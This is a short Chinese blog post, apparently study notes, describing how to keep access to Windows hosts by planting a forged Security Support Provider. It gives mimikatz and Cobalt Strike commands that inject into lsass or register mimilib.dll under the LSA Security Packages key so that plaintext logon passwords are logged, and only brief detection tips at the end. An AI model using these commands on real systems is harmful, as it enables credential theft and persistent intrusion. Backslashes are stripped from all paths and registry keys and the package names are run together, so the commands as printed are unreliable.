前言

继续学习中，今天是权限维持的东西，大家永远不要忘记初心，要一起奋斗哦！

注：单机环境和域环境都可以使用

复现

一.进程注入lsass.exe

使用mimikatz将伪造的SSP注入内存，这样用户在注销重新登录的时候就在C:Windowssystem32mimilsa.log中留下账号和明文密码了

缺点：如果域控制器重启了，伪造的SSP就会没了

1.使用cs

我们对上线的主机使用下列操作，然后将主机注销登录

然后我们就在C:Windowssystem32mimilsa.log中，发现了账号和明文密码

2.直接使用mimikatz.exe

直接执行下面这串命令就可以了

mimikatz.exe "privilege::debug" "misc::memssp" exit

二.使用dll操作

mimikatz下载地址：Releases · gentilkiwi/mimikatz · GitHub

这里我们使用cs自带，将mimikatz中的mimilib.dll上传上去
或者可以在执行copy mimilib.dll %systemroot%system32，前提你这个地方有mimilib.dll，机子重启后他的密码就会被记录在C:Windowssystem32kiwissp.log中。

注：dll文件的位数要和机子一样

缺点：注册表需要重启生效，实战中不可能重启别人的靶机吧，所以可以和上面一种方法结合。

首先使用命令，查询这个注册表项是否有东西，因为有东西的话，使用修改注册表的命令，他就会让你输入yes是否修改，然后cs会一直弹出这些东西，你就卡死。

powershell reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"

//修改注册表

注册表有东西
powershell echo yes|reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /t REG_MULTI_SZ

注册表没有东西
powershell reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /t REG_MULTI_SZ

 这里我们重启后，查看C:Windowssystem32kiwissp.log文件发现账号和明文密码。

自查

1.检测C:WindowsSystem32中有没有可疑dll文件或者log文件

2.使用火绒剑进行钩子扫描